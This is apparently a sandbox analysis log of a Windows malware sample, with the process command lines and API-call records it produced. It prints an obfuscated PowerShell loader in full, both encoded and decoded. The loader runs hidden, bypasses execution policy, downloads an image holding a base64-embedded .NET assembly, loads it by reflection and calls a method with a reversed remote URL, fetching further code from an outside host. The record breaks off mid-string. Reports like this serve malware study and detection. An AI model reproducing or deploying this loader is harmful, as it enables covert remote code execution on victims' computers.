cmdline powershell -command $Codigo = 'J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵VQBy⁂⇵Gw⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵JwBo⁂⇵HQ⁂⇵d⁂⇵Bw⁂⇵HM⁂⇵Og⁂⇵v⁂⇵C8⁂⇵dQBw⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵Z⁂⇵Bl⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBu⁂⇵HM⁂⇵LgBj⁂⇵G8⁂⇵bQ⁂⇵u⁂⇵GI⁂⇵cg⁂⇵v⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBz⁂⇵C8⁂⇵M⁂⇵⁂⇵w⁂⇵DQ⁂⇵Lw⁂⇵1⁂⇵DU⁂⇵OQ⁂⇵v⁂⇵DU⁂⇵MQ⁂⇵w⁂⇵C8⁂⇵bwBy⁂⇵Gk⁂⇵ZwBp⁂⇵G4⁂⇵YQBs⁂⇵C8⁂⇵cgB1⁂⇵G0⁂⇵c⁂⇵Bf⁂⇵H⁂⇵⁂⇵cgBp⁂⇵HY⁂⇵YQB0⁂⇵GU⁂⇵LgBq⁂⇵H⁂⇵⁂⇵Zw⁂⇵/⁂⇵DE⁂⇵Ng⁂⇵5⁂⇵D⁂⇵⁂⇵NQ⁂⇵w⁂⇵DQ⁂⇵MQ⁂⇵y⁂⇵Dk⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵dwBl⁂⇵GI⁂⇵QwBs⁂⇵Gk⁂⇵ZQBu⁂⇵HQ⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵TgBl⁂⇵Hc⁂⇵LQBP⁂⇵GI⁂⇵agBl⁂⇵GM⁂⇵d⁂⇵⁂⇵g⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵TgBl⁂⇵HQ⁂⇵LgBX⁂⇵GU⁂⇵YgBD⁂⇵Gw⁂⇵aQBl⁂⇵G4⁂⇵d⁂⇵⁂⇵7⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵Hc⁂⇵ZQBi⁂⇵EM⁂⇵b⁂⇵Bp⁂⇵GU⁂⇵bgB0⁂⇵C4⁂⇵R⁂⇵Bv⁂⇵Hc⁂⇵bgBs⁂⇵G8⁂⇵YQBk⁂⇵EQ⁂⇵YQB0⁂⇵GE⁂⇵K⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBV⁂⇵HI⁂⇵b⁂⇵⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵u⁂⇵EU⁂⇵bgBj⁂⇵G8⁂⇵Z⁂⇵Bp⁂⇵G4⁂⇵ZwBd⁂⇵Do⁂⇵OgBV⁂⇵FQ⁂⇵Rg⁂⇵4⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵UwB0⁂⇵HI⁂⇵aQBu⁂⇵Gc⁂⇵K⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBC⁂⇵Hk⁂⇵d⁂⇵Bl⁂⇵HM⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵Jw⁂⇵8⁂⇵Dw⁂⇵QgBB⁂⇵FM⁂⇵RQ⁂⇵2⁂⇵DQ⁂⇵XwBT⁂⇵FQ⁂⇵QQBS⁂⇵FQ⁂⇵Pg⁂⇵+⁂⇵Cc⁂⇵Ow⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵Jw⁂⇵8⁂⇵Dw⁂⇵QgBB⁂⇵FM⁂⇵RQ⁂⇵2⁂⇵DQ⁂⇵XwBF⁂⇵E4⁂⇵R⁂⇵⁂⇵+⁂⇵D4⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBU⁂⇵GU⁂⇵e⁂⇵B0⁂⇵C4⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵E8⁂⇵Zg⁂⇵o⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵ZQBu⁂⇵GQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵TwBm⁂⇵Cg⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BG⁂⇵Gw⁂⇵YQBn⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵HM⁂⇵d⁂⇵Bh⁂⇵HI⁂⇵d⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵Gc⁂⇵ZQ⁂⇵g⁂⇵D⁂⇵⁂⇵I⁂⇵⁂⇵t⁂⇵GE⁂⇵bgBk⁂⇵C⁂⇵⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵Gc⁂⇵d⁂⇵⁂⇵g⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵Cs⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵LgBM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵7⁂⇵CQ⁂⇵YgBh⁂⇵HM⁂⇵ZQ⁂⇵2⁂⇵DQ⁂⇵T⁂⇵Bl⁂⇵G4⁂⇵ZwB0⁂⇵Gg⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵C⁂⇵⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵Ds⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BD⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBT⁂⇵HU⁂⇵YgBz⁂⇵HQ⁂⇵cgBp⁂⇵G4⁂⇵Zw⁂⇵o⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵s⁂⇵C⁂⇵⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bj⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵QwBv⁂⇵G4⁂⇵dgBl⁂⇵HI⁂⇵d⁂⇵Bd⁂⇵Do⁂⇵OgBG⁂⇵HI⁂⇵bwBt⁂⇵EI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵FM⁂⇵d⁂⇵By⁂⇵Gk⁂⇵bgBn⁂⇵Cg⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BD⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵ZQBk⁂⇵EE⁂⇵cwBz⁂⇵GU⁂⇵bQBi⁂⇵Gw⁂⇵eQ⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵UgBl⁂⇵GY⁂⇵b⁂⇵Bl⁂⇵GM⁂⇵d⁂⇵Bp⁂⇵G8⁂⇵bg⁂⇵u⁂⇵EE⁂⇵cwBz⁂⇵GU⁂⇵bQBi⁂⇵Gw⁂⇵eQBd⁂⇵Do⁂⇵OgBM⁂⇵G8⁂⇵YQBk⁂⇵Cg⁂⇵J⁂⇵Bj⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵p⁂⇵Ds⁂⇵J⁂⇵B0⁂⇵Hk⁂⇵c⁂⇵Bl⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵b⁂⇵Bv⁂⇵GE⁂⇵Z⁂⇵Bl⁂⇵GQ⁂⇵QQBz⁂⇵HM⁂⇵ZQBt⁂⇵GI⁂⇵b⁂⇵B5⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵V⁂⇵B5⁂⇵H⁂⇵⁂⇵ZQ⁂⇵o⁂⇵Cc⁂⇵RgBp⁂⇵GI⁂⇵ZQBy⁂⇵C4⁂⇵S⁂⇵Bv⁂⇵G0⁂⇵ZQ⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵d⁂⇵B5⁂⇵H⁂⇵⁂⇵ZQ⁂⇵u⁂⇵Ec⁂⇵ZQB0⁂⇵E0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵Cg⁂⇵JwBW⁂⇵EE⁂⇵SQ⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵GE⁂⇵cgBn⁂⇵HU⁂⇵bQBl⁂⇵G4⁂⇵d⁂⇵Bz⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Cw⁂⇵K⁂⇵⁂⇵n⁂⇵HQ⁂⇵e⁂⇵B0⁂⇵C4⁂⇵S⁂⇵BC⁂⇵C8⁂⇵QQBU⁂⇵FM⁂⇵V⁂⇵⁂⇵v⁂⇵DQ⁂⇵Lg⁂⇵1⁂⇵Dc⁂⇵MQ⁂⇵u⁂⇵D⁂⇵⁂⇵MQ⁂⇵y⁂⇵C4⁂⇵Mg⁂⇵5⁂⇵DE⁂⇵Lw⁂⇵v⁂⇵Do⁂⇵c⁂⇵B0⁂⇵HQ⁂⇵a⁂⇵⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C4⁂⇵SQBu⁂⇵HY⁂⇵bwBr⁂⇵GU⁂⇵K⁂⇵⁂⇵k⁂⇵G4⁂⇵dQBs⁂⇵Gw⁂⇵L⁂⇵⁂⇵g⁂⇵CQ⁂⇵YQBy⁂⇵Gc⁂⇵dQBt⁂⇵GU⁂⇵bgB0⁂⇵HM⁂⇵KQ⁂⇵=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂⇵','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/559/510/original/rump_private.jpg?1690504129';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.HB/ATST/4.571.012.291//:ptth');$method.Invoke($null, $arguments)"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2740
thread_handle: 0x000002e8
process_identifier: 2736
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵VQBy⁂⇵Gw⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵JwBo⁂⇵HQ⁂⇵d⁂⇵Bw⁂⇵HM⁂⇵Og⁂⇵v⁂⇵C8⁂⇵dQBw⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵Z⁂⇵Bl⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBu⁂⇵HM⁂⇵LgBj⁂⇵G8⁂⇵bQ⁂⇵u⁂⇵GI⁂⇵cg⁂⇵v⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBz⁂⇵C8⁂⇵M⁂⇵⁂⇵w⁂⇵DQ⁂⇵Lw⁂⇵1⁂⇵DU⁂⇵OQ⁂⇵v⁂⇵DU⁂⇵MQ⁂⇵w⁂⇵C8⁂⇵bwBy⁂⇵Gk⁂⇵ZwBp⁂⇵G4⁂⇵YQBs⁂⇵C8⁂⇵cgB1⁂⇵G0⁂⇵c⁂⇵Bf⁂⇵H⁂⇵⁂⇵cgBp⁂⇵HY⁂⇵YQB0⁂⇵GU⁂⇵LgBq⁂⇵H⁂⇵⁂⇵Zw⁂⇵/⁂⇵DE⁂⇵Ng⁂⇵5⁂⇵D⁂⇵⁂⇵NQ⁂⇵w⁂⇵DQ⁂⇵MQ⁂⇵y⁂⇵Dk⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵dwBl⁂⇵GI⁂⇵QwBs⁂⇵Gk⁂⇵ZQBu⁂⇵HQ⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵TgBl⁂⇵Hc⁂⇵LQBP⁂⇵GI⁂⇵agBl⁂⇵GM⁂⇵d⁂⇵⁂⇵g⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵TgBl⁂⇵HQ⁂⇵LgBX⁂⇵GU⁂⇵YgBD⁂⇵Gw⁂⇵aQBl⁂⇵G4⁂⇵d⁂⇵⁂⇵7⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵Hc⁂⇵ZQBi⁂⇵EM⁂⇵b⁂⇵Bp⁂⇵GU⁂⇵bgB0⁂⇵C4⁂⇵R⁂⇵Bv⁂⇵Hc⁂⇵bgBs⁂⇵G8⁂⇵YQBk⁂⇵EQ⁂⇵YQB0⁂⇵GE⁂⇵K⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBV⁂⇵HI⁂⇵b⁂⇵⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵u⁂⇵EU⁂⇵bgBj⁂⇵G8⁂⇵Z⁂⇵Bp⁂⇵G4⁂⇵ZwBd⁂⇵Do⁂⇵OgBV⁂⇵FQ⁂⇵Rg⁂⇵4⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵UwB0⁂⇵HI⁂⇵aQBu⁂⇵Gc⁂⇵K⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBC⁂⇵Hk⁂⇵d⁂⇵Bl⁂⇵HM⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵Jw⁂⇵8⁂⇵Dw⁂⇵QgBB⁂⇵FM⁂⇵RQ⁂⇵2⁂⇵DQ⁂⇵XwBT⁂⇵FQ⁂⇵QQBS⁂⇵FQ⁂⇵Pg⁂⇵+⁂⇵Cc⁂⇵Ow⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵Jw⁂⇵8⁂⇵Dw⁂⇵QgBB⁂⇵FM⁂⇵RQ⁂⇵2⁂⇵DQ⁂⇵XwBF⁂⇵E4⁂⇵R⁂⇵⁂⇵+⁂⇵D4⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBU⁂⇵GU⁂⇵e⁂⇵B0⁂⇵C4⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵E8⁂⇵Zg⁂⇵o⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵ZQBu⁂⇵GQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵TwBm⁂⇵Cg⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BG⁂⇵Gw⁂⇵YQBn⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵HM⁂⇵d⁂⇵Bh⁂⇵HI⁂⇵d⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵Gc⁂⇵ZQ⁂⇵g⁂⇵D⁂⇵⁂⇵I⁂⇵⁂⇵t⁂⇵GE⁂⇵bgBk⁂⇵C⁂⇵⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵Gc⁂⇵d⁂⇵⁂⇵g⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵Cs⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵LgBM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵7⁂⇵CQ⁂⇵YgBh⁂⇵HM⁂⇵ZQ⁂⇵2⁂⇵DQ⁂⇵T⁂⇵Bl⁂⇵G4⁂⇵ZwB0⁂⇵Gg⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵C⁂⇵⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵Ds⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BD⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBT⁂⇵HU⁂⇵YgBz⁂⇵HQ⁂⇵cgBp⁂⇵G4⁂⇵Zw⁂⇵o⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵s⁂⇵C⁂⇵⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bj⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵QwBv⁂⇵G4⁂⇵dgBl⁂⇵HI⁂⇵d⁂⇵Bd⁂⇵Do⁂⇵OgBG⁂⇵HI⁂⇵bwBt⁂⇵EI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵FM⁂⇵d⁂⇵By⁂⇵Gk⁂⇵bgBn⁂⇵Cg⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BD⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵ZQBk⁂⇵EE⁂⇵cwBz⁂⇵GU⁂⇵bQBi⁂⇵Gw⁂⇵eQ⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵UgBl⁂⇵GY⁂⇵b⁂⇵Bl⁂⇵GM⁂⇵d⁂⇵Bp⁂⇵G8⁂⇵bg⁂⇵u⁂⇵EE⁂⇵cwBz⁂⇵GU⁂⇵bQBi⁂⇵Gw⁂⇵eQBd⁂⇵Do⁂⇵OgBM⁂⇵G8⁂⇵YQBk⁂⇵Cg⁂⇵J⁂⇵Bj⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵p⁂⇵Ds⁂⇵J⁂⇵B0⁂⇵Hk⁂⇵c⁂⇵Bl⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵b⁂⇵Bv⁂⇵GE⁂⇵Z⁂⇵Bl⁂⇵GQ⁂⇵QQBz⁂⇵HM⁂⇵ZQBt⁂⇵GI⁂⇵b⁂⇵B5⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵V⁂⇵B5⁂⇵H⁂⇵⁂⇵ZQ⁂⇵o⁂⇵Cc⁂⇵RgBp⁂⇵GI⁂⇵ZQBy⁂⇵C4⁂⇵S⁂⇵Bv⁂⇵G0⁂⇵ZQ⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵d⁂⇵B5⁂⇵H⁂⇵⁂⇵ZQ⁂⇵u⁂⇵Ec⁂⇵ZQB0⁂⇵E0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵Cg⁂⇵JwBW⁂⇵EE⁂⇵SQ⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵GE⁂⇵cgBn⁂⇵HU⁂⇵bQBl⁂⇵G4⁂⇵d⁂⇵Bz⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Cw⁂⇵K⁂⇵⁂⇵n⁂⇵HQ⁂⇵e⁂⇵B0⁂⇵C4⁂⇵S⁂⇵BC⁂⇵C8⁂⇵QQBU⁂⇵FM⁂⇵V⁂⇵⁂⇵v⁂⇵DQ⁂⇵Lg⁂⇵1⁂⇵Dc⁂⇵MQ⁂⇵u⁂⇵D⁂⇵⁂⇵MQ⁂⇵y⁂⇵C4⁂⇵Mg⁂⇵5⁂⇵DE⁂⇵Lw⁂⇵v⁂⇵Do⁂⇵c⁂⇵B0⁂⇵HQ⁂⇵a⁂⇵⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C4⁂⇵SQBu⁂⇵HY⁂⇵bwBr⁂⇵GU⁂⇵K⁂⇵⁂⇵k⁂⇵G4⁂⇵dQBs⁂⇵Gw⁂⇵L⁂⇵⁂⇵g⁂⇵CQ⁂⇵YQBy⁂⇵Gc⁂⇵dQBt⁂⇵GU⁂⇵bgB0⁂⇵HM⁂⇵KQ⁂⇵=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂⇵','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002f0
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -command $Codigo = 'J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵VQBy⁂⇵Gw⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵JwBo⁂⇵HQ⁂⇵d⁂⇵Bw⁂⇵HM⁂⇵Og⁂⇵v⁂⇵C8⁂⇵dQBw⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵Z⁂⇵Bl⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBu⁂⇵HM⁂⇵LgBj⁂⇵G8⁂⇵bQ⁂⇵u⁂⇵GI⁂⇵cg⁂⇵v⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBz⁂⇵C8⁂⇵M⁂⇵⁂⇵w⁂⇵DQ⁂⇵Lw⁂⇵1⁂⇵DU⁂⇵OQ⁂⇵v⁂⇵DU⁂⇵MQ⁂⇵w⁂⇵C8⁂⇵bwBy⁂⇵Gk⁂⇵ZwBp⁂⇵G4⁂⇵YQBs⁂⇵C8⁂⇵cgB1⁂⇵G0⁂⇵c⁂⇵Bf⁂⇵H⁂⇵⁂⇵cgBp⁂⇵HY⁂⇵YQB0⁂⇵GU⁂⇵LgBq⁂⇵H⁂⇵⁂⇵Zw⁂⇵/⁂⇵DE⁂⇵Ng⁂⇵5⁂⇵D⁂⇵⁂⇵NQ⁂⇵w⁂⇵DQ⁂⇵MQ⁂⇵y⁂⇵Dk⁂⇵Jw⁂